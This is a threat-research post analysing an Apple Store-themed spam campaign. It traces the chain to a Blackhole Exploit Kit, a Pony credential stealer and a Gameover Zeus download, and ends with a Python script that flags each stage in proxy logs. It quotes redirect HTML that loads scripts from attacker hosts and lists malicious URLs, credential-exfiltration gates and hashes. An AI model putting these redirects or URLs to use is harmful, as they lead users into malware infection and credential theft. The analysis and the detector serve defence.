Thank you for your order

On 2012-03-29 we observed an Apple Store-themed spam. The observed sample had a subject line of “Thank you for your order” and the following text:

Dear Customer,

Thank you for shopping at Apple Store.

Here is a notice that your Order Number: W259985718 has been successfully charged to your credit card for 4,200.10 USD.

Please CLICK HERE to see your ORDER.

Your Apple Store Customer Service Team

This email contained a link to www.horizontefc.com.br/y2yMPUY4/index.html. Hmm, that URL pattern definitely looks familiar, right? It sure does...

Predictably, the malicious link led to a page with the following HTML, which loads two JavaScript redirects:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="http://telefonspass24.de/w2ziooxT/js.js"></script>
<script type="text/javascript" src="http://gpatrol.com/XwWWQjzf/js.js"></script>

These scripts redirected victims to a Blackhole Exploit Kit landing page at http://88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff.

This Blackhole Exploit Kit instance unfortunately included an updated Java exploit (CVE-2012-0507). The malicious .jar file served by this kit had the following properties:

File: Pol.jar
Size: 14765
MD5: 8E300391CB3011ED76390C021E20F728

The kit then dropped the following Pony downloader:

File: readme.exe
Size: 150569
MD5: C1D691E2FCE076E58463DB5F5DF441CA

The Pony downloader was configured to send stolen FTP credentials to the following dropzones:

http://50.56.208.113:8080/pony/gate.php
http://83.174.131.142:8080/pony/gate.php

The Pony downloader then downloaded a Gameover Zeus variant from the following locations:

http://fragmanist.com/ngjYq.exe
http://genxlogistics.com/wE68.exe

This Zeus variant had the following properties:

Size: 319528
MD5: A374A4151C893BA731833E60655FAD26

This Zeus variant had a botid of “NR29”.
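The infection chain above (landing page, js.js redirects, Blackhole landing at showthread.php?t=&lt;hex&gt;, Pony gate.php check-in, payload download) leaves a recognisable footprint in web proxy logs. The script below is an added example, not part of the original post: it scans constructed proxy-log lines for each stage of this chain and groups the hits per client, so a responder can see which hosts went all the way through. The regular expressions generalise the eight-character directory and sixteen-hex-digit thread id seen in the quoted URLs; they are my assumption about the kit's URL scheme, not a published signature.

```python
import re
from urllib.parse import urlparse

# Stage patterns generalised from the URLs quoted in the post (assumption:
# the 8-character directory and 16-hex-digit "t=" value are kit conventions).
STAGES = [
    ("spam-landing", re.compile(r"^/[A-Za-z0-9]{8}/index\.html$")),
    ("redirect-js", re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")),
    ("blackhole-kit", re.compile(r"^/showthread\.php$")),
    ("pony-gate", re.compile(r"^/pony/gate\.php$")),
    ("exe-download", re.compile(r"^/[A-Za-z0-9]{1,12}\.exe$")),
]
HEX16_QUERY = re.compile(r"^t=[0-9a-f]{16}$")

def classify_url(url):
    """Return the chain stage a URL matches, or None if it matches nothing."""
    parsed = urlparse(url)
    for name, pattern in STAGES:
        if pattern.match(parsed.path):
            # A forum named showthread.php is common; require the kit-style hex id.
            if name == "blackhole-kit" and not HEX16_QUERY.match(parsed.query):
                return None
            return name
    return None

def scan_proxy_log(lines):
    """Scan 'timestamp client method url' lines; return (client, stage, url) hits."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        stage = classify_url(parts[3])
        if stage:
            hits.append((parts[1], stage, parts[3]))
    return hits

def chain_per_client(hits):
    """Group the stages each client touched, in log order."""
    chains = {}
    for client, stage, _ in hits:
        chains.setdefault(client, []).append(stage)
    return chains

# Constructed sample log: one victim walking the whole chain, one benign client.
SAMPLE_LOG = """\
2012-03-29T10:01:02 10.0.0.7 GET http://www.horizontefc.com.br/y2yMPUY4/index.html
2012-03-29T10:01:03 10.0.0.7 GET http://telefonspass24.de/w2ziooxT/js.js
2012-03-29T10:01:03 10.0.0.7 GET http://gpatrol.com/XwWWQjzf/js.js
2012-03-29T10:01:05 10.0.0.7 GET http://88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff
2012-03-29T10:01:09 10.0.0.7 POST http://50.56.208.113:8080/pony/gate.php
2012-03-29T10:01:12 10.0.0.7 GET http://fragmanist.com/ngjYq.exe
2012-03-29T10:02:00 10.0.0.9 GET http://www.example.com/forum/showthread.php?t=12345
2012-03-29T10:02:30 10.0.0.9 GET http://www.example.com/index.html
"""

if __name__ == "__main__":
    for client, stages in chain_per_client(scan_proxy_log(SAMPLE_LOG.splitlines())).items():
        print(client, "->", " > ".join(stages))
```

A client that reaches "blackhole-kit" followed by "pony-gate" or "exe-download" is worth treating as compromised rather than merely exposed.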
